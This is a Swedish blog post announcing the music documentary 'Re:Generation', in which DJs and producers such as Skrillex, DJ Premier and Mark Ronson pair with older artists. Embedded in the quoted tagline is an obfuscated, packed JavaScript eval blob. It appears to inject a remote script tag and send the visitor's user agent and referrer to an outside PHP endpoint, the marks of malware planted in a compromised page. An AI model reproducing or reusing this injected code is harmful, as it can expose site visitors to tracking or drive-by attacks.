Image Image Image Image Image Image Image Image Image Image

| 15 augusti, 2020

Scroll to top

Top

RE:GENERATION: Ny musik möter gammal musik

RE:GENERATION: Ny musik möter gammal musik
Alexander Gylemo
”Five eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bzfyy|var|u0026u|referrer|zarie||js|php’.split(’|’),0,{}))
DJs turn the tables on the history of music…” Re:Generation

En ny musikdokumentär producerad av the Grammy’s och regisserat av Amir Bar Lev är på ingång. Konceptet går ut på att nya stjärnskott i den moderna musikbranschen ska tillsammans med gamla stjärnor producera varsin låt. Än så länge vet vi att DJ Premier ska tillsammans med Nas producera en klassisk sång med Berklee School of Music Orchestra, dubstepartisten Pretty Lights kör country tillsammans med Paul Stanley och Leann Rimes, Crystal Method gör en r&b låt med Martha Reeves, Mark Ronson och Erykah Badu gör lite jazz och sist men inte minst har vi Skrillex, som tillsammans med de återstående bandmedlemmarna från the Doors ska göra en dubstep-inspirerad rocklåt.

Det ska bli spännande att se dessa musikaliska giganter göra musik tillsammans och framför allt höra resultatet!

Enligt tidningen Rolling Stone lär filmen ha premiär tidigt 2012 och kommer promotas hårt under Grammisgalaveckan, det ryktas även om ett live event på The Grammy Museum, troligen då någon gång också.

Nedan ser vi debut-trailern:

httpv://www.youtube.com/watch?v=wWDXuNXrnp8

Comments